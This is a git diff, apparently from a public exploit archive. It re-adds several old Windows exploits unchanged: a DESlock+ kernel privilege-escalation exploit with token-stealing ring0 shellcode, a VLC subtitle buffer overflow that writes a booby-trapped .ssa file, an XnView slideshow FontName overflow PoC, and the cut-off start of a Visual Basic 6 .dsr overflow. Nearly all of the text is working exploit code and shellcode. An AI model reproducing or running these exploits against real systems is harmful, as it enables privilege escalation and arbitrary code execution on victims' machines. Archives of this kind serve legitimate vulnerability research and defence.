-  "\xcc"
-  /* _cmd_eprocess_found
-   * _ring0_end           */
-
-  /* copy tokens!$%!      */
-  "\x8b\x89\xc8\x00\x00\x00"
-  "\x89\x88\xc8\x00\x00\x00"
-  "\x90";
-
-static unsigned char win32_ret[] =
-  "\x5b"
-  "\x31\xff"
-  "\xb8\xdc\x0b\x00\x00"
-  "\xff\xe0"
-  "\xcc";
-
-struct ioctl_req {
-  void *arg[20];
-};
-
-static PCHAR
-fixup_ring0_shell (PVOID base, DWORD ppid, DWORD *zlen)
-{
-  DWORD dwVersion, dwMajorVersion, dwMinorVersion;
-
-  dwVersion = GetVersion ();
-  dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion)));
-  dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion)));
-
-  if (dwMajorVersion != 5)
-    {
-      fprintf (stderr, "* GetVersion, unsupported version\n");
-      exit (EXIT_FAILURE);
-    }
-
-  *(PDWORD) &win32_fixup[5]  += (DWORD) base;
-  *(PDWORD) &win32_fixup[22] += (DWORD) base;
-  *(PDWORD) &win32_fixup[26] += (DWORD) base;
-  *(PDWORD) &win32_fixup[30] += (DWORD) base;
-  *(PDWORD) &win32_fixup[34] += (DWORD) base;
-  *(PDWORD) &win32_fixup[38] += (DWORD) base;
-
-  *(PDWORD) &win32_ret[4] += (DWORD) base;
-
-  switch (dwMinorVersion)
-    {
-      case 1:
-        *zlen = sizeof winxp_ring0_shell - 1;
-        *(PDWORD) &winxp_ring0_shell[55] = ppid;
-        return (winxp_ring0_shell);
-
-      case 2:
-        *zlen = sizeof win2k3_ring0_shell - 1;
-        *(PDWORD) &win2k3_ring0_shell[58] = ppid;
-        return (win2k3_ring0_shell);
-
-      default:
-        fprintf (stderr, "* GetVersion, unsupported version\n");
-        exit (EXIT_FAILURE);
-    }
-
-  return (NULL);
-}
-
-static PVOID
-get_module_base (void)
-{
-  PSYSTEM_MODULE_INFORMATION_ENTRY pModuleBase;
-  PSYSTEM_MODULE_INFORMATION pModuleInfo;
-  DWORD i, num_modules, status, rlen;
-  PVOID result;
-
-  status = NtQuerySystemInformation (SystemModuleInformation, NULL, 0, &rlen);
-  if (status != STATUS_INFO_LENGTH_MISMATCH)
-    {
-      fprintf (stderr, "* NtQuerySystemInformation failed, 0x%08X\n", status);
-      exit (EXIT_FAILURE);
-    }
-
-  pModuleInfo = (PSYSTEM_MODULE_INFORMATION) HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, rlen);
-
-  status = NtQuerySystemInformation (SystemModuleInformation, pModuleInfo, rlen, &rlen);
-  if (status != STATUS_SUCCESS)
-    {
-      fprintf (stderr, "* NtQuerySystemInformation failed, 0x%08X\n", status);
-      exit (EXIT_FAILURE);
-    }
-
-  num_modules = pModuleInfo->Count;
-  pModuleBase = &pModuleInfo->Module[0];
-  result = NULL;
-
-  for (i = 0; i < num_modules; i++, pModuleBase++)
-    if (strstr (pModuleBase->ImageName, "dlkfdisk.sys"))
-      {
-        result = pModuleBase->Base;
-        break;
-      }
-
-  HeapFree (GetProcessHeap (), HEAP_NO_SERIALIZE, pModuleInfo);
-
-  return (result);
-}
-
-int
-main (int argc, char **argv)
-{
-  struct ioctl_req req;
-  DWORD disk_no, i, rlen, zlen, ppid;
-  CHAR rbuf[64], sbuf[512];
-  LPVOID zpage, zbuf, base;
-  HANDLE hFile;
-  BOOL result;
-
-  printf ("DESlock+ <= 3.2.6 local kernel ring0 SYSTEM exploit\n"
-          "by: \n"
-          "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
-
-  if (argc <= 1)
-    {
-      fprintf (stderr, "Usage: %s \n", argv[0]);
-      exit (EXIT_SUCCESS);
-    }
-
-  ppid = atoi (argv[1]);
-
-  hFile = CreateFileA ("\\\\.\\DLKFDisk_Control", FILE_EXECUTE,
-                       FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
-                       OPEN_EXISTING, 0, NULL);
-  if (hFile == INVALID_HANDLE_VALUE)
-    {
-      fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
-      exit (EXIT_FAILURE);
-    }
-
-  for (i = 0; i < DLKFDISK_DISK_MAX; i++)
-    {
-      memset (&req, 0, sizeof req);
-      req.arg[0] = (void *) 0xDEADBEEF;
-      req.arg[1] = (void *) 0xDEADBEEF;
-      req.arg[2] = (void *) 0xDEADBEEF;
-      req.arg[3] = (void *) i;            /* drive number   */
-      req.arg[4] = (void *) sizeof sbuf;  /* buffer size    */
-      req.arg[5] = (void *) sbuf;         /* buffer pointer */
-
-      result = DeviceIoControl (hFile, DLKFDISK_IOCTL,
-                                &req, sizeof req, rbuf, sizeof rbuf, &rlen, 0);
-      if (!result)
-        {
-          fprintf (stderr, "* DeviceIoControl failed\n");
-          exit (EXIT_FAILURE);
-        }
-
-      if (strlen (sbuf + DLKFDISK_OFFSET - 1) > 6 &&
-          strcmp (sbuf + DLKFDISK_OFFSET - 1 + 6, ":\\XXXAAAA.mnt") == 0)
-        {
-          disk_no = i;
-          break;
-        }
-    }
-  printf ("* write buf: \"%s\"\n", &sbuf[DLKFDISK_OFFSET - 1]);
-
-  zpage = VirtualAlloc ((LPVOID) 0x41410000, 0x10000,
-                        MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-  if (zpage == NULL)
-    {
-      fprintf (stderr, "* VirtualAlloc failed\n");
-      exit (EXIT_FAILURE);
-    }
-  printf ("* allocated page: 0x%08X [%d-bytes]\n",
-          zpage, 0x10000);
-
-  base = get_module_base ();
-  if (base == NULL)
-    {
-      fprintf (stderr, "* unable to find dlkfdisk.sys base\n");
-      exit (EXIT_FAILURE);
-    }
-  printf ("* dlkfdisk.sys base: 0x%08X\n", base);
-
-  memset (zpage, 0xCC, 0x10000);
-  zbuf = fixup_ring0_shell (base, ppid, &zlen);
-  memcpy ((LPVOID) 0x41414141, win32_fixup, sizeof (win32_fixup) - 1);
-  memcpy ((LPVOID) (0x41414141 + sizeof (win32_fixup) - 1), zbuf, zlen);
-  memcpy ((LPVOID) (0x41414141 + sizeof (win32_fixup) + zlen - 1),
-          win32_ret, sizeof (win32_ret) - 1);
-
-  memset (&req, 0, sizeof req);
-  req.arg[0] = (void *) 0xDEADBEEF;
-  req.arg[1] = (void *) 0xDEADBEEF;
-  req.arg[2] = (void *) 0xDEADBEEF;
-  req.arg[3] = (void *) disk_no;                                    /* drive number   */
-  req.arg[4] = (void *) 512;                                        /* buffer size    */
-  req.arg[5] = (void *) (base + DLKFDISK_SLOT - DLKFDISK_OFFSET);   /* buffer pointer */
-
-  printf ("* overwriting [@0x%08X %d-bytes].. ",
-          base + DLKFDISK_SLOT, strlen (sbuf + DLKFDISK_OFFSET - 1) + 1);
-  result = DeviceIoControl (hFile, DLKFDISK_IOCTL,
-                            &req, sizeof req, rbuf, sizeof rbuf, &rlen, 0);
-  if (!result)
-    {
-      fprintf (stderr, "DeviceIoControl failed\n");
-      exit (EXIT_FAILURE);
-    }
-  printf ("done\n");
-
-  /* jump to our address :) */
-  printf ("* jumping.. ");
-  result = DeviceIoControl (hFile, DLKFDISK_R_IOCTL,
-                            &req, sizeof req, rbuf, sizeof rbuf, &rlen, 0);
-  if (!result)
-    {
-      fprintf (stderr, "DeviceIoControl failed\n");
-      exit (EXIT_FAILURE);
-    }
-  printf ("done\n\n"
-          "* hmmm, you didn't STOP the box?!?!\n");
-
-  CloseHandle (hFile);
-
-  return (EXIT_SUCCESS);
-}
-
-// milw0rm.com [2008-02-18]
+/* deslock-pown-v2.c
+ *
+ * Copyright (c) 2008 by 
+ *
+ * DESlock+ <= 3.2.6 local kernel ring0 SYSTEM exploit
+ * by mu-b - Wed 26 Dec 2007
+ *
+ * - Tested on: DLMFDISK.sys 1.2.0.27
+ *              - Microsoft Windows 2003 SP2
+ *              - Microsoft Windows XP SP2
+ *
+ * Note: create a mountable filesystem (size/password is irrelevant),
+ * name the pseudo-filesystem "XXXAAAA.mnt" and copy to "?:\",
+ * finally mount the pseudo-filesystem and ./deslock-pown-v2 for SYSTEM.
+ *
+ * Compile: MinGW + -lntdll
+ *
+ *    - Private Source Code -DO NOT DISTRIBUTE -
+ * http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
+ */
+
+#include 
+#include 
+
+#include 
+#include 
+
+#define DLKFDISK_IOCTL    0x80002024
+#define DLKFDISK_R_IOCTL  0x80002010
+#define DLKFDISK_SLOT     0x00000C5A
+#define DLKFDISK_OFFSET   0x0D
+#define DLKFDISK_DISK_MAX 0x1A
+
+static unsigned char win32_fixup[] =
+  "\x53"
+  "\xeb\x0e"
+  /* _fixup_copy  */
+  "\x5e"
+  "\xbf\x5c\x0c\x00\x00"
+  "\x31\xc9"
+  "\xb1\x05"
+  "\xf3\xa5"
+  "\xeb\x19"
+  /* _fixup_blk   */
+  "\xe8\xed\xff\xff\xff"
+  "\x64\x0a\x00\x00"
+  "\xd3\x0a\x00\x00"
+  "\x2a\x0a\x00\x00"
+  "\x49\x0a\x00\x00"
+  "\x68\x0b\x00\x00";
+
+/* Win2k3 SP1/2 - kernel EPROCESS token switcher
+ * by mu-b 
+ */
+static unsigned char win2k3_ring0_shell[] =
+  /* _ring0 */
+  "\xb8\x24\xf1\xdf\xff"
+  "\x8b\x00"
+  "\x8b\xb0\x18\x02\x00\x00"
+  "\x89\xf0"
+  /* _sys_eprocess_loop   */
+  "\x8b\x98\x94\x00\x00\x00"
+  "\x81\xfb\x04\x00\x00\x00"
+  "\x74\x11"
+  "\x8b\x80\x9c\x00\x00\x00"
+  "\x2d\x98\x00\x00\x00"
+  "\x39\xf0"
+  "\x75\xe3"
+  "\xeb\x21"
+  /* _sys_eprocess_found  */
+  "\x89\xc1"
+  "\x89\xf0"
+
+  /* _cmd_eprocess_loop   */
+  "\x8b\x98\x94\x00\x00\x00"
+  "\x81\xfb\x00\x00\x00\x00"
+  "\x74\x10"
+  "\x8b\x80\x9c\x00\x00\x00"
+  "\x2d\x98\x00\x00\x00"
+  "\x39\xf0"
+  "\x75\xe3"
+  /* _not_found           */
+  "\xcc"
+  /* _cmd_eprocess_found
+   * _ring0_end           */
+
+  /* copy tokens!$%!      */
+  "\x8b\x89\xd8\x00\x00\x00"
+  "\x89\x88\xd8\x00\x00\x00"
+  "\x90";
+
+static unsigned char winxp_ring0_shell[] =
+  /* _ring0 */
+  "\xb8\x24\xf1\xdf\xff"
+  "\x8b\x00"
+  "\x8b\x70\x44"
+  "\x89\xf0"
+  /* _sys_eprocess_loop   */
+  "\x8b\x98\x84\x00\x00\x00"
+  "\x81\xfb\x04\x00\x00\x00"
+  "\x74\x11"
+  "\x8b\x80\x8c\x00\x00\x00"
+  "\x2d\x88\x00\x00\x00"
+  "\x39\xf0"
+  "\x75\xe3"
+  "\xeb\x21"
+  /* _sys_eprocess_found  */
+  "\x89\xc1"
+  "\x89\xf0"
+
+  /* _cmd_eprocess_loop   */
+  "\x8b\x98\x84\x00\x00\x00"
+  "\x81\xfb\x00\x00\x00\x00"
+  "\x74\x10"
+  "\x8b\x80\x8c\x00\x00\x00"
+  "\x2d\x88\x00\x00\x00"
+  "\x39\xf0"
+  "\x75\xe3"
+  /* _not_found           */
+  "\xcc"
+  /* _cmd_eprocess_found
+   * _ring0_end           */
+
+  /* copy tokens!$%!      */
+  "\x8b\x89\xc8\x00\x00\x00"
+  "\x89\x88\xc8\x00\x00\x00"
+  "\x90";
+
+static unsigned char win32_ret[] =
+  "\x5b"
+  "\x31\xff"
+  "\xb8\xdc\x0b\x00\x00"
+  "\xff\xe0"
+  "\xcc";
+
+struct ioctl_req {
+  void *arg[20];
+};
+
+static PCHAR
+fixup_ring0_shell (PVOID base, DWORD ppid, DWORD *zlen)
+{
+  DWORD dwVersion, dwMajorVersion, dwMinorVersion;
+
+  dwVersion = GetVersion ();
+  dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion)));
+  dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion)));
+
+  if (dwMajorVersion != 5)
+    {
+      fprintf (stderr, "* GetVersion, unsupported version\n");
+      exit (EXIT_FAILURE);
+    }
+
+  *(PDWORD) &win32_fixup[5]  += (DWORD) base;
+  *(PDWORD) &win32_fixup[22] += (DWORD) base;
+  *(PDWORD) &win32_fixup[26] += (DWORD) base;
+  *(PDWORD) &win32_fixup[30] += (DWORD) base;
+  *(PDWORD) &win32_fixup[34] += (DWORD) base;
+  *(PDWORD) &win32_fixup[38] += (DWORD) base;
+
+  *(PDWORD) &win32_ret[4] += (DWORD) base;
+
+  switch (dwMinorVersion)
+    {
+      case 1:
+        *zlen = sizeof winxp_ring0_shell - 1;
+        *(PDWORD) &winxp_ring0_shell[55] = ppid;
+        return (winxp_ring0_shell);
+
+      case 2:
+        *zlen = sizeof win2k3_ring0_shell - 1;
+        *(PDWORD) &win2k3_ring0_shell[58] = ppid;
+        return (win2k3_ring0_shell);
+
+      default:
+        fprintf (stderr, "* GetVersion, unsupported version\n");
+        exit (EXIT_FAILURE);
+    }
+
+  return (NULL);
+}
+
+static PVOID
+get_module_base (void)
+{
+  PSYSTEM_MODULE_INFORMATION_ENTRY pModuleBase;
+  PSYSTEM_MODULE_INFORMATION pModuleInfo;
+  DWORD i, num_modules, status, rlen;
+  PVOID result;
+
+  status = NtQuerySystemInformation (SystemModuleInformation, NULL, 0, &rlen);
+  if (status != STATUS_INFO_LENGTH_MISMATCH)
+    {
+      fprintf (stderr, "* NtQuerySystemInformation failed, 0x%08X\n", status);
+      exit (EXIT_FAILURE);
+    }
+
+  pModuleInfo = (PSYSTEM_MODULE_INFORMATION) HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, rlen);
+
+  status = NtQuerySystemInformation (SystemModuleInformation, pModuleInfo, rlen, &rlen);
+  if (status != STATUS_SUCCESS)
+    {
+      fprintf (stderr, "* NtQuerySystemInformation failed, 0x%08X\n", status);
+      exit (EXIT_FAILURE);
+    }
+
+  num_modules = pModuleInfo->Count;
+  pModuleBase = &pModuleInfo->Module[0];
+  result = NULL;
+
+  for (i = 0; i < num_modules; i++, pModuleBase++)
+    if (strstr (pModuleBase->ImageName, "dlkfdisk.sys"))
+      {
+        result = pModuleBase->Base;
+        break;
+      }
+
+  HeapFree (GetProcessHeap (), HEAP_NO_SERIALIZE, pModuleInfo);
+
+  return (result);
+}
+
+int
+main (int argc, char **argv)
+{
+  struct ioctl_req req;
+  DWORD disk_no, i, rlen, zlen, ppid;
+  CHAR rbuf[64], sbuf[512];
+  LPVOID zpage, zbuf, base;
+  HANDLE hFile;
+  BOOL result;
+
+  printf ("DESlock+ <= 3.2.6 local kernel ring0 SYSTEM exploit\n"
+          "by: \n"
+          "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
+
+  if (argc <= 1)
+    {
+      fprintf (stderr, "Usage: %s \n", argv[0]);
+      exit (EXIT_SUCCESS);
+    }
+
+  ppid = atoi (argv[1]);
+
+  hFile = CreateFileA ("\\\\.\\DLKFDisk_Control", FILE_EXECUTE,
+                       FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
+                       OPEN_EXISTING, 0, NULL);
+  if (hFile == INVALID_HANDLE_VALUE)
+    {
+      fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
+      exit (EXIT_FAILURE);
+    }
+
+  for (i = 0; i < DLKFDISK_DISK_MAX; i++)
+    {
+      memset (&req, 0, sizeof req);
+      req.arg[0] = (void *) 0xDEADBEEF;
+      req.arg[1] = (void *) 0xDEADBEEF;
+      req.arg[2] = (void *) 0xDEADBEEF;
+      req.arg[3] = (void *) i;            /* drive number   */
+      req.arg[4] = (void *) sizeof sbuf;  /* buffer size    */
+      req.arg[5] = (void *) sbuf;         /* buffer pointer */
+
+      result = DeviceIoControl (hFile, DLKFDISK_IOCTL,
+                                &req, sizeof req, rbuf, sizeof rbuf, &rlen, 0);
+      if (!result)
+        {
+          fprintf (stderr, "* DeviceIoControl failed\n");
+          exit (EXIT_FAILURE);
+        }
+
+      if (strlen (sbuf + DLKFDISK_OFFSET - 1) > 6 &&
+          strcmp (sbuf + DLKFDISK_OFFSET - 1 + 6, ":\\XXXAAAA.mnt") == 0)
+        {
+          disk_no = i;
+          break;
+        }
+    }
+  printf ("* write buf: \"%s\"\n", &sbuf[DLKFDISK_OFFSET - 1]);
+
+  zpage = VirtualAlloc ((LPVOID) 0x41410000, 0x10000,
+                        MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+  if (zpage == NULL)
+    {
+      fprintf (stderr, "* VirtualAlloc failed\n");
+      exit (EXIT_FAILURE);
+    }
+  printf ("* allocated page: 0x%08X [%d-bytes]\n",
+          zpage, 0x10000);
+
+  base = get_module_base ();
+  if (base == NULL)
+    {
+      fprintf (stderr, "* unable to find dlkfdisk.sys base\n");
+      exit (EXIT_FAILURE);
+    }
+  printf ("* dlkfdisk.sys base: 0x%08X\n", base);
+
+  memset (zpage, 0xCC, 0x10000);
+  zbuf = fixup_ring0_shell (base, ppid, &zlen);
+  memcpy ((LPVOID) 0x41414141, win32_fixup, sizeof (win32_fixup) - 1);
+  memcpy ((LPVOID) (0x41414141 + sizeof (win32_fixup) - 1), zbuf, zlen);
+  memcpy ((LPVOID) (0x41414141 + sizeof (win32_fixup) + zlen - 1),
+          win32_ret, sizeof (win32_ret) - 1);
+
+  memset (&req, 0, sizeof req);
+  req.arg[0] = (void *) 0xDEADBEEF;
+  req.arg[1] = (void *) 0xDEADBEEF;
+  req.arg[2] = (void *) 0xDEADBEEF;
+  req.arg[3] = (void *) disk_no;                                    /* drive number   */
+  req.arg[4] = (void *) 512;                                        /* buffer size    */
+  req.arg[5] = (void *) (base + DLKFDISK_SLOT - DLKFDISK_OFFSET);   /* buffer pointer */
+
+  printf ("* overwriting [@0x%08X %d-bytes].. ",
+          base + DLKFDISK_SLOT, strlen (sbuf + DLKFDISK_OFFSET - 1) + 1);
+  result = DeviceIoControl (hFile, DLKFDISK_IOCTL,
+                            &req, sizeof req, rbuf, sizeof rbuf, &rlen, 0);
+  if (!result)
+    {
+      fprintf (stderr, "DeviceIoControl failed\n");
+      exit (EXIT_FAILURE);
+    }
+  printf ("done\n");
+
+  /* jump to our address :) */
+  printf ("* jumping.. ");
+  result = DeviceIoControl (hFile, DLKFDISK_R_IOCTL,
+                            &req, sizeof req, rbuf, sizeof rbuf, &rlen, 0);
+  if (!result)
+    {
+      fprintf (stderr, "DeviceIoControl failed\n");
+      exit (EXIT_FAILURE);
+    }
+  printf ("done\n\n"
+          "* hmmm, you didn't STOP the box?!?!\n");
+
+  CloseHandle (hFile);
+
+  return (EXIT_SUCCESS);
+}
+
+// milw0rm.com [2008-02-18]
diff --git a/platforms/windows/local/5250.cpp b/platforms/windows/local/5250.cpp
index 46f2e32e3..1e10eafa3 100755
--- a/platforms/windows/local/5250.cpp
+++ b/platforms/windows/local/5250.cpp
@@ -1,94 +1,94 @@
-/*
-VLC <=0.8.6.e
-Subtitle parsing local buffer overflow exploit
-Creadit to cuongmx@gmail.com vs Look2Me @
-Tested on windows XP Pro SP2
-
-*/
-
-#include 
-#include 
-#include 
-
-char ssa_header[]=
-"[Script Info]\r\n"
-"Title: VLC <= 0.8.6c,e buffer-overflow\r\n"
-"ScriptType: v4.00\r\n"
-"Collisions: Normal\r\n"
-"[V4 Styles]\r\n"
-"[Events]\r\n"
-"Dialogue:";
-
-// execute calculator from Meta
-char shellcode[] =
-"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3d"
-"\xba\xb1\xd9\x83\xeb\xfc\xe2\xf4\xc1\x52\xf5\xd9\x3d\xba\x3a\x9c"
-"\x01\x31\xcd\xdc\x45\xbb\x5e\x52\x72\xa2\x3a\x86\x1d\xbb\x5a\x90"
-"\xb6\x8e\x3a\xd8\xd3\x8b\x71\x40\x91\x3e\x71\xad\x3a\x7b\x7b\xd4"
-"\x3c\x78\x5a\x2d\x06\xee\x95\xdd\x48\x5f\x3a\x86\x19\xbb\x5a\xbf"
-"\xb6\xb6\xfa\x52\x62\xa6\xb0\x32\xb6\xa6\x3a\xd8\xd6\x33\xed\xfd"
-"\x39\x79\x80\x19\x59\x31\xf1\xe9\xb8\x7a\xc9\xd5\xb6\xfa\xbd\x52"
-"\x4d\xa6\x1c\x52\x55\xb2\x5a\xd0\xb6\x3a\x01\xd9\x3d\xba\x3a\xb1"
-"\x01\xe5\x80\x2f\x5d\xec\x38\x21\xbe\x7a\xca\x89\x55\xc4\x69\x3b"
-"\x4e\xd2\x29\x27\xb7\xb4\xe6\x26\xda\xd9\xd0\xb5\x5e\xba\xb1\xd9";
-
-char szJMP[]=
-"\x90\x90\xe9\x38\xff\xff\xff\xeb\xf9\x90\x90\x0b\x0b\x38\x00";
-
-char szAVI[]=
-"\x52\x49\x46\x46\xC\x0\x0\x0\x41\x56\x49\x20\x4C\x49\x53\x54\x00\x00\x00";
-
-main()
-{
-    int i,j,k;
-    printf("Give me your VLC version:\r\n");
-    printf("1> version 8.06.c\r\n");
-    printf("2> version 8.06.d\r\n");
-    printf("3> version 8.06.e\r\nChose:");
-    j=getchar();
-    switch(j)
-    {
-        case '1': k=165254;break;
-        case '2': printf("\r\nI haven't got this version!\r\n Good Luck :-)");
-                  getchar();
-                  return 0;break;
-        case '3': k=165286;break;
-    }
-    k=k-sizeof(shellcode);
-    printf("\r\n[+] Creating .ssa file ...");
-    FILE*    f;
-    char    szBuffer[170000];
-    char    szBuffer2[200];
-
-    strcpy(szBuffer,ssa_header);    // header of ssa
-    
-    memset((szBuffer+sizeof(ssa_header)-1),'\x90',k);
-    szBuffer[k+sizeof(ssa_header)]='\x00';
-    strcpy(szBuffer2,shellcode);
-    strcat(szBuffer2,szJMP);
-    strcat(szBuffer,szBuffer2);
-    
-    f=fopen("Bof-VLC.ssa","wb");
-    if(f==NULL)
-    {
-        printf("Can't create file");
-        exit;
-    }
-    fwrite(szBuffer,1,strlen(szBuffer),f);  // write header
-    fclose(f);
-    printf("\r\n[+] .ssa file successfully create!");
-	
-	printf("\r\n[+] Creation .avi file ...");
-    f=fopen("Bof-VLC.avi","wb");
-    if(f==NULL)
-    {
-        printf("Can't create file");
-        exit;
-    }
-    fwrite(szAVI,1,sizeof(szAVI),f);  // write header
-    fclose(f);	
-    printf("\r\n[+] .avi file successfully create!");
-    getchar();
-}
-
-// milw0rm.com [2008-03-14]
+/*
+VLC <=0.8.6.e
+Subtitle parsing local buffer overflow exploit
+Creadit to cuongmx@gmail.com vs Look2Me @
+Tested on windows XP Pro SP2
+
+*/
+
+#include 
+#include 
+#include 
+
+char ssa_header[]=
+"[Script Info]\r\n"
+"Title: VLC <= 0.8.6c,e buffer-overflow\r\n"
+"ScriptType: v4.00\r\n"
+"Collisions: Normal\r\n"
+"[V4 Styles]\r\n"
+"[Events]\r\n"
+"Dialogue:";
+
+// execute calculator from Meta
+char shellcode[] =
+"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3d"
+"\xba\xb1\xd9\x83\xeb\xfc\xe2\xf4\xc1\x52\xf5\xd9\x3d\xba\x3a\x9c"
+"\x01\x31\xcd\xdc\x45\xbb\x5e\x52\x72\xa2\x3a\x86\x1d\xbb\x5a\x90"
+"\xb6\x8e\x3a\xd8\xd3\x8b\x71\x40\x91\x3e\x71\xad\x3a\x7b\x7b\xd4"
+"\x3c\x78\x5a\x2d\x06\xee\x95\xdd\x48\x5f\x3a\x86\x19\xbb\x5a\xbf"
+"\xb6\xb6\xfa\x52\x62\xa6\xb0\x32\xb6\xa6\x3a\xd8\xd6\x33\xed\xfd"
+"\x39\x79\x80\x19\x59\x31\xf1\xe9\xb8\x7a\xc9\xd5\xb6\xfa\xbd\x52"
+"\x4d\xa6\x1c\x52\x55\xb2\x5a\xd0\xb6\x3a\x01\xd9\x3d\xba\x3a\xb1"
+"\x01\xe5\x80\x2f\x5d\xec\x38\x21\xbe\x7a\xca\x89\x55\xc4\x69\x3b"
+"\x4e\xd2\x29\x27\xb7\xb4\xe6\x26\xda\xd9\xd0\xb5\x5e\xba\xb1\xd9";
+
+char szJMP[]=
+"\x90\x90\xe9\x38\xff\xff\xff\xeb\xf9\x90\x90\x0b\x0b\x38\x00";
+
+char szAVI[]=
+"\x52\x49\x46\x46\xC\x0\x0\x0\x41\x56\x49\x20\x4C\x49\x53\x54\x00\x00\x00";
+
+main()
+{
+    int i,j,k;
+    printf("Give me your VLC version:\r\n");
+    printf("1> version 8.06.c\r\n");
+    printf("2> version 8.06.d\r\n");
+    printf("3> version 8.06.e\r\nChose:");
+    j=getchar();
+    switch(j)
+    {
+        case '1': k=165254;break;
+        case '2': printf("\r\nI haven't got this version!\r\n Good Luck :-)");
+                  getchar();
+                  return 0;break;
+        case '3': k=165286;break;
+    }
+    k=k-sizeof(shellcode);
+    printf("\r\n[+] Creating .ssa file ...");
+    FILE*    f;
+    char    szBuffer[170000];
+    char    szBuffer2[200];
+
+    strcpy(szBuffer,ssa_header);    // header of ssa
+    
+    memset((szBuffer+sizeof(ssa_header)-1),'\x90',k);
+    szBuffer[k+sizeof(ssa_header)]='\x00';
+    strcpy(szBuffer2,shellcode);
+    strcat(szBuffer2,szJMP);
+    strcat(szBuffer,szBuffer2);
+    
+    f=fopen("Bof-VLC.ssa","wb");
+    if(f==NULL)
+    {
+        printf("Can't create file");
+        exit;
+    }
+    fwrite(szBuffer,1,strlen(szBuffer),f);  // write header
+    fclose(f);
+    printf("\r\n[+] .ssa file successfully create!");
+	
+	printf("\r\n[+] Creation .avi file ...");
+    f=fopen("Bof-VLC.avi","wb");
+    if(f==NULL)
+    {
+        printf("Can't create file");
+        exit;
+    }
+    fwrite(szAVI,1,sizeof(szAVI),f);  // write header
+    fclose(f);	
+    printf("\r\n[+] .avi file successfully create!");
+    getchar();
+}
+
+// milw0rm.com [2008-03-14]
diff --git a/platforms/windows/local/5346.pl b/platforms/windows/local/5346.pl
index 118b97dba..79684fdbd 100755
--- a/platforms/windows/local/5346.pl
+++ b/platforms/windows/local/5346.pl
@@ -1,46 +1,46 @@
-#!/usr/bin/perl
-
-# ================================================================
-# XnView 1.92.1 Slideshow "FontName" Buffer Overflow
-# ================================================================
-#
-# Calc execution POC Exploit for WinXP SP1 pro English
-#
-# Found by   : Stefan Cornelius, Secunia Research
-# Advisory   : http://secunia.com/secunia_research/2008-6/advisory
-#
-# Exploit by : haluznik | haluznikgmail.com
-#
-# 04.01.2008 ..April Fools Day ;)
-# ================================================================
-
-
-print "\n [*] XnView 1.92.1 Slideshow exploit by haluznik\n\n";
-
-my $head=
-"\x23\x20\x53\x6c\x69\x64\x65\x20\x53\x68".
-"\x6f\x77\x20\x53\x65\x71\x75\x65\x6e\x63".
-"\x65\x0d\x0a\x46\x6f\x6e\x74\x4e\x61\x6d".
-"\x65\x20\x3d\x20\x22";
-
-$fontname = "A" x 32 . "\xcc\x59\xfb\x77";
-
-my $shellcode=
-"\x33\xc0\x50\x68\x63\x61\x6c\x63\x54\x5b".
-"\x50\x53\xb9\x44\x80\xc2\x77\xff\xd1\x50".
-"\xbb\xfd\x98\xe7\x77\xff\xd3";
-
-my $tail=
-"\x22\x0d\x0a\x22\x43\x3a\x5c\x74\x65\x73".
-"\x74\x2e\x6a\x70\x67\x22\x0d\x0a";
-
-$sld = $head . $fontname . $shellcode . $tail;
-
-print " [+] Creating poc.sld file..\n";
-
-open(file,">poc.sld") || die " [-] cannot write file\n";
-print(file $sld);
-close(file);
-print " [*] Done!\n";
-
-# milw0rm.com [2008-04-02]
+#!/usr/bin/perl
+
+# ================================================================
+# XnView 1.92.1 Slideshow "FontName" Buffer Overflow
+# ================================================================
+#
+# Calc execution POC Exploit for WinXP SP1 pro English
+#
+# Found by   : Stefan Cornelius, Secunia Research
+# Advisory   : http://secunia.com/secunia_research/2008-6/advisory
+#
+# Exploit by : haluznik | haluznikgmail.com
+#
+# 04.01.2008 ..April Fools Day ;)
+# ================================================================
+
+
+print "\n [*] XnView 1.92.1 Slideshow exploit by haluznik\n\n";
+
+my $head=
+"\x23\x20\x53\x6c\x69\x64\x65\x20\x53\x68".
+"\x6f\x77\x20\x53\x65\x71\x75\x65\x6e\x63".
+"\x65\x0d\x0a\x46\x6f\x6e\x74\x4e\x61\x6d".
+"\x65\x20\x3d\x20\x22";
+
+$fontname = "A" x 32 . "\xcc\x59\xfb\x77";
+
+my $shellcode=
+"\x33\xc0\x50\x68\x63\x61\x6c\x63\x54\x5b".
+"\x50\x53\xb9\x44\x80\xc2\x77\xff\xd1\x50".
+"\xbb\xfd\x98\xe7\x77\xff\xd3";
+
+my $tail=
+"\x22\x0d\x0a\x22\x43\x3a\x5c\x74\x65\x73".
+"\x74\x2e\x6a\x70\x67\x22\x0d\x0a";
+
+$sld = $head . $fontname . $shellcode . $tail;
+
+print " [+] Creating poc.sld file..\n";
+
+open(file,">poc.sld") || die " [-] cannot write file\n";
+print(file $sld);
+close(file);
+print " [*] Done!\n";
+
+# milw0rm.com [2008-04-02]
diff --git a/platforms/windows/local/5361.py b/platforms/windows/local/5361.py
index 80f95f697..777627510 100755
--- a/platforms/windows/local/5361.py
+++ b/platforms/windows/local/5361.py
@@ -1,111 +1,111 @@
-#usage: exploit.py
-
-print "-----------------------------------------------------------------------"
-print ' [PoC 2] MS Visual Basic Enterprise Ed. 6 SP6 ".dsr" File Handling BoF\n'
-print " author: shinnai"
-print " mail: shinnai[at]autistici[dot]org"
-print " site: http://shinnai.altervista.org\n"
-print " Once you create the file, open it with Visual Basic 6 and click on"
-print " command name."
-print "-----------------------------------------------------------------------"
-
-buff = "A" * 555
-
